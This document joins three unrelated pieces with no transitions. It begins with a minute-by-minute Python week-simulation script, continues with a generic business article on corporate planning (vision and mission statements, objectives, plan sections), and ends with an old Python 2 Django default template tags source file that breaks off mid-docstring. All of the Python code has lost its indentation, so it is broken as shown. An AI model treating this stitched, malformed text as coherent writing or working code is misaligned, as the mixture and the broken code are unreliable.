# Our unit of time is one minute, and the simulation runs for one week
SIM_TIME = 7 * 24 * 60
DOW=["Sun","Mon","Tue","Wed","Thu","Fri","Sat"]
hour_array=["00","01", "02", "03", "04", "05", "06",
"07","08", "09", "10", "11", "12", "13",
"14","15", "16", "17", "18", "19", "20",
"21","22", "23"]
current_day_hour_minute=None
class DayHourMinute(object):
def __init__(self, day_string, hour_string, minute_string):
self.day=day_string
self.hour=hour_string
self.minute=minute_string
class ScheduleHour(object):
def __init__(self, day, hour, index):
self.day = day
self.hour = hour
self.index = index
#### Start sim run
hour = 0
schedule = []
h = 0
for this_day in DOW:
for this_hour in hour_array:
temp_hour = ScheduleHour(this_day, this_hour, h)
schedule.append(temp_hour)
h += 1
for i in range(1, SIM_TIME):
if i % 60 == 0:
print("Another hour has passed. Last hour %d" % hour)
hour+=1
print("This hour: %d" % hour)
day_index = DOW.index(schedule[hour].day)
current_day_hour_minute = DayHourMinute(schedule[hour].day,
schedule[hour].hour, str(i - int(schedule[hour].hour) * 60
- (1440 * day_index)))
print("Day %s Hour %s Minute %s " % (current_day_hour_minute.day,
current_day_hour_minute.hour,
current_day_hour_minute.minute))
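The day/hour/minute arithmetic above can be cross-checked with a direct divmod decomposition. A small sketch (the helper name is illustrative, not from the script) that converts a simulation minute straight into a (day, hour, minute) triple:

```python
DOW = ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"]

def minute_to_clock(i):
    """Decompose a simulation minute into (day name, hour of day, minute of hour)."""
    day_index, minute_of_day = divmod(i, 24 * 60)  # 1440 minutes per day
    hour, minute = divmod(minute_of_day, 60)
    return DOW[day_index], hour, minute
```

For instance, minute 1441 lands one minute into the second day: `('Mon', 0, 1)`. This matches the script's `i - hour_of_day * 60 - 1440 * day_index` expression, since both subtract the full days and full hours already elapsed.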
|
Corporate planning is creating a strategy for meeting business goals and improving your business. A corporate plan is a roadmap that lays out your business’s plan of action. It is imperative to write down goals and plan for how they will be achieved. Without planning, business operations can be haphazard, and employees are rarely on the same page. When you focus on corporate planning, you set achievable goals and bring your business one step closer to success.
Vision statement: Your company’s vision statement broadly defines what goals you are working to achieve. This statement is where you home in on your business’s focus and what you want to accomplish over the next three to five years. Think big, but remember that you will have to create a strategic plan to back these goals up. So always make sure that your goals can be defined as SMART goals (specific, measurable, achievable, realistic and time-based).
Mission statement: A good mission statement lays out how you will achieve your vision statement in a few sentences. It should illustrate what you plan to offer or sell, the market you are in, and what makes your company unique. A mission statement is like an elevator pitch for your entire strategy. It effectively communicates who you are and what you want to do in a few lines.
Resources and scope: Part of corporate planning is taking stock of everything you currently have going on in your organization. You'll look at your systems, products, employees, assets, programs, divisions, accounting, finance and anything else that is critical to meeting your vision. This part is almost like making a map of your current organization. It gives you a bird’s eye view of everything your company has going on, which helps you create a plan for moving towards the future.
Strategies: Now, it’s time to illustrate the strategies you plan to use to meet the objectives of your company. These strategies could be anything from introducing new products to reducing labor costs by 25 percent, depending on the goal. Your strategies should directly address the objectives you have laid out in your corporate plan, and include a plan of action for how you will implement them. These are the nitty-gritty plan details.
The needs of your corporate planning will vary depending on your business and industry. For example, for automotive giant GM, CEO Mary Barra’s corporate turnaround strategy included several objectives. The main ones included becoming a leader in product and technology, growing the Cadillac brand, continuing to grow the GM brand in China, continuing to improve GM’s finances and becoming more efficient from an operational standpoint. These objectives are, of course, tailored to GM’s specific needs as a company.
Financial objectives: Presumably, you went into business to make money. Your corporate planning financial objectives are your money-oriented goals. These objectives can include growing shareholder value, increasing profits and generating more revenue, to name a few. However, not all financial objectives are about revenue and profits. There are also objectives on cutting costs, balancing budgets, maintaining proper budget ratios and more. Another financial objective example might be diversifying or creating new revenue streams. Your specific goals will depend on your company’s individual needs, but most corporate plans include at least a few financial objectives.
Customer objectives: Your customer objectives center on what you plan to do for your customers. A customer-centered objective could be giving your consumers the best value for the price they pay. Or, you could aim to improve product reliability. Another customer objective is increasing your market share or offering the best possible customer service. These objectives will vary, but they all center around meeting customer demand.
Internal objectives: It’s important to consider internal objectives when doing corporate planning. Internal objectives include three areas: innovation, operations and customer service. Innovation objectives might consist of improving a product or growing the percentage of sales of a particular product. Another innovation objective might be to invest x dollars in the innovation of products. Operations objectives focus on reducing waste, investing in quality, improving workplace safety and reducing errors in manufacturing, to name a few. Another potential operations objective is streamlining. Finally, customer service objectives center on improving customer service, retention and satisfaction.
Learning and growth objectives: Every organization needs learning and growth objectives when corporate planning. Learning and growth objectives are those that involve employees, your company culture and your business’s organizational capacity. One possible example of a learning and growth objective is boosting company culture, increasing employee retention and improving productivity.
Every business needs to do corporate planning. Creating a strategic plan gives your company direction and actionable goals to see through. Without a plan, how will you know your priorities or where to place your resources? A business with a plan achieves better results than one that does not have any direction.
Another reason you need corporate planning is that it can help align your organization and its values. A corporate plan does more than simply keep your employees on a timeline for success. It also defines who you are as a company and what you stand for. Likewise, when employees get a say in the direction of a business and its objectives, your company culture will improve. Planning for the future brings everyone to the table, promotes the exchange of ideas and creates effective solutions to organizational problems. Making and sticking to a plan ensures that everyone in the organization is on the same page. Small business owners especially will find that strategic planning is a great way to get feedback from employees and improve overall culture.
Finally, a corporate plan helps communicate your brand’s message to employees, shareholders, creditors, partners, investors and customers. Taking the time to hone your vision and mission statements is extremely important for messaging, which is essentially communicating what you are and what you want to be as a company. When your purpose as a company is boiled down to its bare bones and made widely available, the message sticks. Everyone immediately knows what your brand stands for and who it hopes to serve. A solid, clear corporate plan can be used to attract investors, customers and employees.
There are no hard-and-fast rules for how to do corporate planning. Each company has unique needs when it comes to planning for the future. However, there are a few tips to keep in mind for corporate planning success. First, gather input from employees across all divisions of the company. You can do this through an open forum or employee meetings.
Next, a crucially important step is to bring the right people together to write the plan. Even if you involve many people in the brainstorming process, only a few should be involved in the actual writing process. Wording can become arduous when too many people are involved. For the first draft of the plan, it’s important not to obsess over every word. That will come later as you revise drafts and bring in more players, such as your board members. At first, only concern yourself with getting the main ideas and objectives written down.
Executive summary: This is the quick version of what your corporate plan includes. An executive summary should concisely cover your brand values, mission, vision, objectives and key strategies.
Signature page: This page will include board member signatures, stating that they agree with and are committed to your goals and vision.
Company description: Include your company’s biography, including its history, products and any significant achievements.
Mission, vision and value statements: These statements outline who your company is, what you do and where you plan to go in the future. This is where you communicate your most important priorities.
Strategic analysis of your company: This is the section that covers a SWOT analysis (strengths, weaknesses, opportunities, threats) of your company and its divisions. The strategic analysis also lays out issues you plan to address in the coming months and years.
Strategies and tactics: In this section, lay out your strategies and how exactly you plan to accomplish them.
Action plan: Your action plan lays out the responsibilities you plan to take on, as well as a timeline for accomplishing them.
Budget and operations plans: Of course, to accomplish your company’s goals, you will need to have money in the budget. Lay out the financials and your specific plan for operations.
Monitoring and evaluation: How do you plan to evaluate if your goals are being met? This section illustrates how you will measure progress for your objectives.
Communication of the plan: A description of how you will communicate your corporate plan to employees, stakeholders, customers and any other important parties.
"""Default tags used by the template system, available to all templates."""
import sys
import re
from itertools import cycle as itertools_cycle
try:
reversed
except NameError:
from django.utils.itercompat import reversed # Python 2.3 fallback
from django.template import Node, NodeList, Template, Context, Variable
from django.template import TemplateSyntaxError, VariableDoesNotExist, BLOCK_TAG_START, BLOCK_TAG_END, VARIABLE_TAG_START, VARIABLE_TAG_END, SINGLE_BRACE_START, SINGLE_BRACE_END, COMMENT_TAG_START, COMMENT_TAG_END
from django.template import get_library, Library, InvalidTemplateLibrary
from django.conf import settings
from django.utils.encoding import smart_str, smart_unicode
from django.utils.itercompat import groupby
from django.utils.safestring import mark_safe
register = Library()
class AutoEscapeControlNode(Node):
"""Implements the actions of the autoescape tag."""
def __init__(self, setting, nodelist):
self.setting, self.nodelist = setting, nodelist
def render(self, context):
old_setting = context.autoescape
context.autoescape = self.setting
output = self.nodelist.render(context)
context.autoescape = old_setting
if self.setting:
return mark_safe(output)
else:
return output
class CommentNode(Node):
def render(self, context):
return ''
class CycleNode(Node):
def __init__(self, cyclevars, variable_name=None):
self.cycle_iter = itertools_cycle([Variable(v) for v in cyclevars])
self.variable_name = variable_name
def render(self, context):
value = self.cycle_iter.next().resolve(context)
if self.variable_name:
context[self.variable_name] = value
return value
class DebugNode(Node):
def render(self, context):
from pprint import pformat
output = [pformat(val) for val in context]
output.append('\n\n')
output.append(pformat(sys.modules))
return ''.join(output)
class FilterNode(Node):
def __init__(self, filter_expr, nodelist):
self.filter_expr, self.nodelist = filter_expr, nodelist
def render(self, context):
output = self.nodelist.render(context)
# Apply filters.
context.update({'var': output})
filtered = self.filter_expr.resolve(context)
context.pop()
return filtered
class FirstOfNode(Node):
def __init__(self, vars):
self.vars = map(Variable, vars)
def render(self, context):
for var in self.vars:
try:
value = var.resolve(context)
except VariableDoesNotExist:
continue
if value:
return smart_unicode(value)
return u''
class ForNode(Node):
def __init__(self, loopvars, sequence, is_reversed, nodelist_loop):
self.loopvars, self.sequence = loopvars, sequence
self.is_reversed = is_reversed
self.nodelist_loop = nodelist_loop
def __repr__(self):
reversed_text = self.is_reversed and ' reversed' or ''
return "<For Node: for %s in %s, tail_len: %d%s>" % \
(', '.join(self.loopvars), self.sequence, len(self.nodelist_loop),
reversed_text)
def __iter__(self):
for node in self.nodelist_loop:
yield node
def get_nodes_by_type(self, nodetype):
nodes = []
if isinstance(self, nodetype):
nodes.append(self)
nodes.extend(self.nodelist_loop.get_nodes_by_type(nodetype))
return nodes
def render(self, context):
nodelist = NodeList()
if 'forloop' in context:
parentloop = context['forloop']
else:
parentloop = {}
context.push()
try:
values = self.sequence.resolve(context, True)
except VariableDoesNotExist:
values = []
if values is None:
values = []
if not hasattr(values, '__len__'):
values = list(values)
len_values = len(values)
if self.is_reversed:
values = reversed(values)
unpack = len(self.loopvars) > 1
# Create a forloop value in the context. We'll update counters on each
# iteration just below.
loop_dict = context['forloop'] = {'parentloop': parentloop}
for i, item in enumerate(values):
# Shortcuts for current loop iteration number.
loop_dict['counter0'] = i
loop_dict['counter'] = i+1
# Reverse counter iteration numbers.
loop_dict['revcounter'] = len_values - i
loop_dict['revcounter0'] = len_values - i - 1
# Boolean values designating first and last times through loop.
loop_dict['first'] = (i == 0)
loop_dict['last'] = (i == len_values - 1)
if unpack:
# If there are multiple loop variables, unpack the item into
# them.
context.update(dict(zip(self.loopvars, item)))
else:
context[self.loopvars[0]] = item
for node in self.nodelist_loop:
nodelist.append(node.render(context))
if unpack:
# The loop variables were pushed on to the context so pop them
# off again. This is necessary because the tag lets the length
# of loopvars differ to the length of each set of items and we
# don't want to leave any vars from the previous loop on the
# context.
context.pop()
context.pop()
return nodelist.render(context)
class IfChangedNode(Node):
def __init__(self, nodelist_true, nodelist_false, *varlist):
self.nodelist_true, self.nodelist_false = nodelist_true, nodelist_false
self._last_seen = None
self._varlist = map(Variable, varlist)
self._id = str(id(self))
def render(self, context):
if 'forloop' in context and self._id not in context['forloop']:
self._last_seen = None
context['forloop'][self._id] = 1
try:
if self._varlist:
# Consider multiple parameters. This automatically behaves
# like an OR evaluation of the multiple variables.
compare_to = [var.resolve(context) for var in self._varlist]
else:
compare_to = self.nodelist_true.render(context)
except VariableDoesNotExist:
compare_to = None
if compare_to != self._last_seen:
firstloop = (self._last_seen is None)
self._last_seen = compare_to
context.push()
context['ifchanged'] = {'firstloop': firstloop}
content = self.nodelist_true.render(context)
context.pop()
return content
elif self.nodelist_false:
return self.nodelist_false.render(context)
return ''
class IfEqualNode(Node):
def __init__(self, var1, var2, nodelist_true, nodelist_false, negate):
self.var1, self.var2 = Variable(var1), Variable(var2)
self.nodelist_true, self.nodelist_false = nodelist_true, nodelist_false
self.negate = negate
def __repr__(self):
return "<IfEqualNode>"
def render(self, context):
try:
val1 = self.var1.resolve(context)
except VariableDoesNotExist:
val1 = None
try:
val2 = self.var2.resolve(context)
except VariableDoesNotExist:
val2 = None
if (self.negate and val1 != val2) or (not self.negate and val1 == val2):
return self.nodelist_true.render(context)
return self.nodelist_false.render(context)
class IfNode(Node):
def __init__(self, bool_exprs, nodelist_true, nodelist_false, link_type):
self.bool_exprs = bool_exprs
self.nodelist_true, self.nodelist_false = nodelist_true, nodelist_false
self.link_type = link_type
def __repr__(self):
return "<If node>"
def __iter__(self):
for node in self.nodelist_true:
yield node
for node in self.nodelist_false:
yield node
def get_nodes_by_type(self, nodetype):
nodes = []
if isinstance(self, nodetype):
nodes.append(self)
nodes.extend(self.nodelist_true.get_nodes_by_type(nodetype))
nodes.extend(self.nodelist_false.get_nodes_by_type(nodetype))
return nodes
def render(self, context):
if self.link_type == IfNode.LinkTypes.or_:
for ifnot, bool_expr in self.bool_exprs:
try:
value = bool_expr.resolve(context, True)
except VariableDoesNotExist:
value = None
if (value and not ifnot) or (ifnot and not value):
return self.nodelist_true.render(context)
return self.nodelist_false.render(context)
else:
for ifnot, bool_expr in self.bool_exprs:
try:
value = bool_expr.resolve(context, True)
except VariableDoesNotExist:
value = None
if not ((value and not ifnot) or (ifnot and not value)):
return self.nodelist_false.render(context)
return self.nodelist_true.render(context)
class LinkTypes:
and_ = 0,
or_ = 1
class RegroupNode(Node):
def __init__(self, target, expression, var_name):
self.target, self.expression = target, expression
self.var_name = var_name
def render(self, context):
obj_list = self.target.resolve(context, True)
if obj_list is None:
# target variable wasn't found in context; fail silently.
context[self.var_name] = []
return ''
# List of dictionaries in the format:
# {'grouper': 'key', 'list': [list of contents]}.
context[self.var_name] = [
{'grouper': key, 'list': list(val)}
for key, val in
groupby(obj_list, lambda v, f=self.expression.resolve: f(v, True))
]
return ''
def include_is_allowed(filepath):
for root in settings.ALLOWED_INCLUDE_ROOTS:
if filepath.startswith(root):
return True
return False
class SsiNode(Node):
def __init__(self, filepath, parsed):
self.filepath, self.parsed = filepath, parsed
def render(self, context):
if not include_is_allowed(self.filepath):
if settings.DEBUG:
return "[Didn't have permission to include file]"
else:
return '' # Fail silently for invalid includes.
try:
fp = open(self.filepath, 'r')
output = fp.read()
fp.close()
except IOError:
output = ''
if self.parsed:
try:
t = Template(output, name=self.filepath)
return t.render(context)
except TemplateSyntaxError, e:
if settings.DEBUG:
return "[Included template had syntax error: %s]" % e
else:
return '' # Fail silently for invalid included templates.
return output
class LoadNode(Node):
def render(self, context):
return ''
class NowNode(Node):
def __init__(self, format_string):
self.format_string = format_string
def render(self, context):
from datetime import datetime
from django.utils.dateformat import DateFormat
df = DateFormat(datetime.now())
return df.format(self.format_string)
class SpacelessNode(Node):
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context):
from django.utils.html import strip_spaces_between_tags
return strip_spaces_between_tags(self.nodelist.render(context).strip())
class TemplateTagNode(Node):
mapping = {'openblock': BLOCK_TAG_START,
'closeblock': BLOCK_TAG_END,
'openvariable': VARIABLE_TAG_START,
'closevariable': VARIABLE_TAG_END,
'openbrace': SINGLE_BRACE_START,
'closebrace': SINGLE_BRACE_END,
'opencomment': COMMENT_TAG_START,
'closecomment': COMMENT_TAG_END,
}
def __init__(self, tagtype):
self.tagtype = tagtype
def render(self, context):
return self.mapping.get(self.tagtype, '')
class URLNode(Node):
def __init__(self, view_name, args, kwargs):
self.view_name = view_name
self.args = args
self.kwargs = kwargs
def render(self, context):
from django.core.urlresolvers import reverse, NoReverseMatch
args = [arg.resolve(context) for arg in self.args]
kwargs = dict([(smart_str(k,'ascii'), v.resolve(context))
for k, v in self.kwargs.items()])
try:
return reverse(self.view_name, args=args, kwargs=kwargs)
except NoReverseMatch:
try:
project_name = settings.SETTINGS_MODULE.split('.')[0]
return reverse(project_name + '.' + self.view_name,
args=args, kwargs=kwargs)
except NoReverseMatch:
return ''
class WidthRatioNode(Node):
def __init__(self, val_expr, max_expr, max_width):
self.val_expr = val_expr
self.max_expr = max_expr
self.max_width = max_width
def render(self, context):
try:
value = self.val_expr.resolve(context)
maxvalue = self.max_expr.resolve(context)
except VariableDoesNotExist:
return ''
try:
value = float(value)
maxvalue = float(maxvalue)
ratio = (value / maxvalue) * int(self.max_width)
except (ValueError, ZeroDivisionError):
return ''
return str(int(round(ratio)))
class WithNode(Node):
def __init__(self, var, name, nodelist):
self.var = var
self.name = name
self.nodelist = nodelist
def __repr__(self):
return "<WithNode>"
def render(self, context):
val = self.var.resolve(context)
context.push()
context[self.name] = val
output = self.nodelist.render(context)
context.pop()
return output
#@register.tag
def autoescape(parser, token):
"""
Force autoescape behaviour for this block.
"""
args = token.contents.split()
if len(args) != 2:
raise TemplateSyntaxError("'Autoescape' tag requires exactly one argument.")
arg = args[1]
if arg not in (u'on', u'off'):
raise TemplateSyntaxError("'Autoescape' argument should be 'on' or 'off'")
nodelist = parser.parse(('endautoescape',))
parser.delete_first_token()
return AutoEscapeControlNode((arg == 'on'), nodelist)
autoescape = register.tag(autoescape)
#@register.tag
def comment(parser, token):
"""
Ignores everything between ``{% comment %}`` and ``{% endcomment %}``.
"""
parser.skip_past('endcomment')
return CommentNode()
comment = register.tag(comment)
#@register.tag
def cycle(parser, token):
"""
Cycles among the given strings each time this tag is encountered.
Within a loop, cycles among the given strings each time through
the loop::
{% for o in some_list %}
<tr class="{% cycle 'row1' 'row2' %}">
...
</tr>
{% endfor %}
Outside of a loop, give the values a unique name the first time you call
it, then use that name each successive time through::
<tr class="{% cycle 'row1' 'row2' 'row3' as rowcolors %}">...</tr>
<tr class="{% cycle rowcolors %}">...</tr>
<tr class="{% cycle rowcolors %}">...</tr>
You can use any number of values, separated by spaces. Commas can also
be used to separate values; if a comma is used, the cycle values are
interpreted as literal strings.
"""
# Note: This returns the exact same node on each {% cycle name %} call;
# that is, the node object returned from {% cycle a b c as name %} and the
# one returned from {% cycle name %} are the exact same object. This
# shouldn't cause problems (heh), but if it does, now you know.
#
# Ugly hack warning: This stuffs the named template dict into parser so
# that names are only unique within each template (as opposed to using
# a global variable, which would make cycle names have to be unique across
# *all* templates).
args = token.split_contents()
if len(args) < 2:
raise TemplateSyntaxError("'cycle' tag requires at least two arguments")
if ',' in args[1]:
# Backwards compatibility: {% cycle a,b %} or {% cycle a,b as foo %}
# case.
args[1:2] = ['"%s"' % arg for arg in args[1].split(",")]
if len(args) == 2:
# {% cycle foo %} case.
name = args[1]
if not hasattr(parser, '_namedCycleNodes'):
raise TemplateSyntaxError("No named cycles in template. '%s' is not defined" % name)
if not name in parser._namedCycleNodes:
raise TemplateSyntaxError("Named cycle '%s' does not exist" % name)
return parser._namedCycleNodes[name]
if len(args) > 4 and args[-2] == 'as':
name = args[-1]
node = CycleNode(args[1:-2], name)
if not hasattr(parser, '_namedCycleNodes'):
parser._namedCycleNodes = {}
parser._namedCycleNodes[name] = node
else:
node = CycleNode(args[1:])
return node
cycle = register.tag(cycle)
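The cycle tag above is driven by ``itertools_cycle``; the same rotation behaviour can be sketched outside the template engine in plain Python (the names here are illustrative, not part of Django's API):

```python
from itertools import cycle

# Rotate through CSS classes the way {% cycle 'row1' 'row2' %} does:
# each next() call yields the next value, wrapping around forever.
row_classes = cycle(['row1', 'row2'])
rows = [next(row_classes) for _ in range(5)]
# rows alternates 'row1', 'row2', 'row1', ...
```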
def debug(parser, token):
"""
Outputs a whole load of debugging information, including the current
context and imported modules.
Sample usage::
<pre>
{% debug %}
</pre>
"""
return DebugNode()
debug = register.tag(debug)
#@register.tag(name="filter")
def do_filter(parser, token):
"""
Filters the contents of the block through variable filters.
Filters can also be piped through each other, and they can have
arguments -- just like in variable syntax.
Sample usage::
{% filter force_escape|lower %}
This text will be HTML-escaped, and will appear in lowercase.
{% endfilter %}
"""
_, rest = token.contents.split(None, 1)
filter_expr = parser.compile_filter("var|%s" % (rest))
for func, unused in filter_expr.filters:
if getattr(func, '_decorated_function', func).__name__ in ('escape', 'safe'):
raise TemplateSyntaxError('"filter %s" is not permitted. Use the "autoescape" tag instead.' % func.__name__)
nodelist = parser.parse(('endfilter',))
parser.delete_first_token()
return FilterNode(filter_expr, nodelist)
do_filter = register.tag("filter", do_filter)
#@register.tag
def firstof(parser, token):
"""
Outputs the first variable passed that is not False.
Outputs nothing if all the passed variables are False.
Sample usage::
{% firstof var1 var2 var3 %}
This is equivalent to::
{% if var1 %}
{{ var1 }}
{% else %}{% if var2 %}
{{ var2 }}
{% else %}{% if var3 %}
{{ var3 }}
{% endif %}{% endif %}{% endif %}
but obviously much cleaner!
You can also use a literal string as a fallback value in case all
passed variables are False::
{% firstof var1 var2 var3 "fallback value" %}
"""
bits = token.split_contents()[1:]
if len(bits) < 1:
raise TemplateSyntaxError("'firstof' statement requires at least one"
" argument")
return FirstOfNode(bits)
firstof = register.tag(firstof)
#@register.tag(name="for")
def do_for(parser, token):
"""
Loops over each item in an array.
For example, to display a list of athletes given ``athlete_list``::
<ul>
{% for athlete in athlete_list %}
<li>{{ athlete.name }}</li>
{% endfor %}
</ul>
You can loop over a list in reverse by using
``{% for obj in list reversed %}``.
You can also unpack multiple values from a two-dimensional array::
{% for key,value in dict.items %}
{{ key }}: {{ value }}
{% endfor %}
The for loop sets a number of variables available within the loop:
========================== ================================================
Variable Description
========================== ================================================
``forloop.counter`` The current iteration of the loop (1-indexed)
``forloop.counter0`` The current iteration of the loop (0-indexed)
``forloop.revcounter`` The number of iterations from the end of the
loop (1-indexed)
``forloop.revcounter0`` The number of iterations from the end of the
loop (0-indexed)
``forloop.first`` True if this is the first time through the loop
``forloop.last`` True if this is the last time through the loop
``forloop.parentloop`` For nested loops, this is the loop "above" the
current one
========================== ================================================
"""
bits = token.contents.split()
if len(bits) < 4:
raise TemplateSyntaxError("'for' statements should have at least four"
" words: %s" % token.contents)
is_reversed = bits[-1] == 'reversed'
in_index = is_reversed and -3 or -2
if bits[in_index] != 'in':
raise TemplateSyntaxError("'for' statements should use the format"
" 'for x in y': %s" % token.contents)
loopvars = re.sub(r' *, *', ',', ' '.join(bits[1:in_index])).split(',')
for var in loopvars:
if not var or ' ' in var:
raise TemplateSyntaxError("'for' tag received an invalid argument:"
" %s" % token.contents)
sequence = parser.compile_filter(bits[in_index+1])
nodelist_loop = parser.parse(('endfor',))
parser.delete_first_token()
return ForNode(loopvars, sequence, is_reversed, nodelist_loop)
do_for = register.tag("for", do_for)
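The counters that ``ForNode.render`` maintains in ``loop_dict`` can be summarised in a standalone sketch (a hypothetical helper, not part of Django) that yields each item together with the metadata the for tag exposes:

```python
def forloop_vars(values):
    """Yield (item, meta) pairs with the counters the for tag exposes."""
    n = len(values)
    for i, item in enumerate(values):
        yield item, {
            'counter0': i, 'counter': i + 1,          # 0- and 1-indexed position
            'revcounter': n - i, 'revcounter0': n - i - 1,  # counts from the end
            'first': i == 0, 'last': i == n - 1,      # boundary flags
        }
```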
def do_ifequal(parser, token, negate):
bits = list(token.split_contents())
if len(bits) != 3:
raise TemplateSyntaxError, "%r takes two arguments" % bits[0]
end_tag = 'end' + bits[0]
nodelist_true = parser.parse(('else', end_tag))
token = parser.next_token()
if token.contents == 'else':
nodelist_false = parser.parse((end_tag,))
parser.delete_first_token()
else:
nodelist_false = NodeList()
return IfEqualNode(bits[1], bits[2], nodelist_true, nodelist_false, negate)
#@register.tag
def ifequal(parser, token):
"""
Outputs the contents of the block if the two arguments equal each other.
Examples::
{% ifequal user.id comment.user_id %}
...
{% endifequal %}
{% ifnotequal user.id comment.user_id %}
...
{% else %}
...
{% endifnotequal %}
"""
return do_ifequal(parser, token, False)
ifequal = register.tag(ifequal)
#@register.tag
def ifnotequal(parser, token):
"""
Outputs the contents of the block if the two arguments are not equal.
See ifequal.
"""
return do_ifequal(parser, token, True)
ifnotequal = register.tag(ifnotequal)
#@register.tag(name="if")
def do_if(parser, token):
"""
The ``{% if %}`` tag evaluates a variable, and if that variable is "true"
(i.e., exists, is not empty, and is not a false boolean value), the
contents of the block are output:
::
{% if athlete_list %}
Number of athletes: {{ athlete_list|count }}
{% else %}
No athletes.
{% endif %}
In the above, if ``athlete_list`` is not empty, the number of athletes will
be displayed by the ``{{ athlete_list|count }}`` variable.
As you can see, the ``if`` tag can take an optional ``{% else %}`` clause
that will be displayed if the test fails.
``if`` tags may use ``or``, ``and`` or ``not`` to test a number of
variables or to negate a given variable::
{% if not athlete_list %}
There are no athletes.
{% endif %}
{% if athlete_list or coach_list %}
There are some athletes or some coaches.
{% endif %}
{% if athlete_list and coach_list %}
Both athletes and coaches are available.
{% endif %}
{% if not athlete_list or coach_list %}
There are no athletes, or there are some coaches.
{% endif %}
{% if athlete_list and not coach_list %}
There are some athletes and absolutely no coaches.
{% endif %}
``if`` tags do not allow ``and`` and ``or`` clauses with the same tag,
because the order of logic would be ambiguous. For example, this is
invalid::
{% if athlete_list and coach_list or cheerleader_list %}
If you need to combine ``and`` and ``or`` to do advanced logic, just use
nested if tags. For example::
{% if athlete_list %}
{% if coach_list or cheerleader_list %}
We have athletes, and either coaches or cheerleaders!
{% endif %}
{% endif %}
"""
bits = token.contents.split()
del bits[0]
if not bits:
raise TemplateSyntaxError("'if' statement requires at least one argument")
# Bits now looks something like this: ['a', 'or', 'not', 'b', 'or', 'c.d']
bitstr = ' '.join(bits)
boolpairs = bitstr.split(' and ')
boolvars = []
if len(boolpairs) == 1:
link_type = IfNode.LinkTypes.or_
boolpairs = bitstr.split(' or ')
else:
link_type = IfNode.LinkTypes.and_
if ' or ' in bitstr:
raise TemplateSyntaxError, "'if' tags can't mix 'and' and 'or'"
for boolpair in boolpairs:
if ' ' in boolpair:
try:
not_, boolvar = boolpair.split()
except ValueError:
raise TemplateSyntaxError, "'if' statement improperly formatted"
if not_ != 'not':
raise TemplateSyntaxError, "Expected 'not' in if statement"
boolvars.append((True, parser.compile_filter(boolvar)))
else:
boolvars.append((False, parser.compile_filter(boolpair)))
nodelist_true = parser.parse(('else', 'endif'))
token = parser.next_token()
if token.contents == 'else':
nodelist_false = parser.parse(('endif',))
parser.delete_first_token()
else:
nodelist_false = NodeList()
return IfNode(boolvars, nodelist_true, nodelist_false, link_type)
do_if = register.tag("if", do_if)
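The and/or handling in ``do_if`` boils down to one decision: split on ``' and '`` first, and only if that yields a single piece re-split on ``' or '``; mixing the two is rejected. A minimal standalone sketch of that logic (omitting ``compile_filter`` and the ``not`` handling):

```python
def split_if_expression(bitstr):
    """Mimic do_if's and/or split: 'and' and 'or' cannot be mixed."""
    parts = bitstr.split(' and ')
    if len(parts) == 1:
        # No 'and' present: treat the expression as an 'or' chain.
        return 'or', bitstr.split(' or ')
    if ' or ' in bitstr:
        raise ValueError("'if' tags can't mix 'and' and 'or'")
    return 'and', parts
```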
#@register.tag
def ifchanged(parser, token):
"""
Checks if a value has changed from the last iteration of a loop.
The 'ifchanged' block tag is used within a loop. It has two possible uses.
1. Checks its own rendered contents against its previous state and only
displays the content if it has changed. For example, this displays a
list of days, only displaying the month if it changes::
<h1>Archive for {{ year }}</h1>
{% for date in days %}
{% ifchanged %}<h3>{{ date|date:"F" }}</h3>{% endifchanged %}
<a href="{{ date|date:"M/d"|lower }}/">{{ date|date:"j" }}</a>
{% endfor %}
2. If given a variable, check whether that variable has changed.
For example, the following shows the date every time it changes, but
only shows the hour if both the hour and the date have changed::
{% for date in days %}
{% ifchanged date.date %} {{ date.date }} {% endifchanged %}
{% ifchanged date.hour date.date %}
{{ date.hour }}
{% endifchanged %}
{% endfor %}
"""
bits = token.contents.split()
nodelist_true = parser.parse(('else', 'endifchanged'))
token = parser.next_token()
if token.contents == 'else':
nodelist_false = parser.parse(('endifchanged',))
parser.delete_first_token()
else:
nodelist_false = NodeList()
return IfChangedNode(nodelist_true, nodelist_false, *bits[1:])
ifchanged = register.tag(ifchanged)
#@register.tag
def ssi(parser, token):
"""
Outputs the contents of a given file into the page.
Like a simple "include" tag, the ``ssi`` tag includes the contents
of another file -- which must be specified using an absolute path --
in the current page::
{% ssi /home/html/ljworld.com/includes/right_generic.html %}
If the optional "parsed" parameter is given, the contents of the included
file are evaluated as template code, with the current context::
{% ssi /home/html/ljworld.com/includes/right_generic.html parsed %}
"""
bits = token.contents.split()
parsed = False
if len(bits) not in (2, 3):
raise TemplateSyntaxError("'ssi' tag takes one argument: the path to"
" the file to be included")
if len(bits) == 3:
if bits[2] == 'parsed':
parsed = True
else:
raise TemplateSyntaxError("Second (optional) argument to %s tag"
" must be 'parsed'" % bits[0])
return SsiNode(bits[1], parsed)
ssi = register.tag(ssi)
#@register.tag
def load(parser, token):
"""
Loads a custom template tag set.
For example, to load the template tags in
``django/templatetags/news/photos.py``::
{% load news.photos %}
"""
bits = token.contents.split()
for taglib in bits[1:]:
# add the library to the parser
try:
lib = get_library("django.templatetags.%s" % taglib)
parser.add_library(lib)
except InvalidTemplateLibrary, e:
raise TemplateSyntaxError("'%s' is not a valid tag library: %s" %
(taglib, e))
return LoadNode()
load = register.tag(load)
#@register.tag
def now(parser, token):
"""
Displays the date, formatted according to the given string.
Uses the same format as PHP's ``date()`` function; see http://php.net/date
for all the possible values.
Sample usage::
It is {% now "jS F Y H:i" %}
"""
bits = token.contents.split('"')
if len(bits) != 3:
raise TemplateSyntaxError, "'now' statement takes one argument"
format_string = bits[1]
return NowNode(format_string)
now = register.tag(now)
#@register.tag
def regroup(parser, token):
"""
Regroups a list of alike objects by a common attribute.
This complex tag is best illustrated by use of an example: say that
``people`` is a list of ``Person`` objects that have ``first_name``,
``last_name``, and ``gender`` attributes, and you'd like to display a list
that looks like:
* Male:
* George Bush
* Bill Clinton
* Female:
* Margaret Thatcher
* Condoleezza Rice
* Unknown:
* Pat Smith
The following snippet of template code would accomplish this dubious task::
{% regroup people by gender as grouped %}
<ul>
{% for group in grouped %}
<li>{{ group.grouper }}
<ul>
{% for item in group.list %}
<li>{{ item }}</li>
{% endfor %}
</ul>
{% endfor %}
</ul>
As you can see, ``{% regroup %}`` populates a variable with a list of
objects with ``grouper`` and ``list`` attributes. ``grouper`` contains the
item that was grouped by; ``list`` contains the list of objects that share
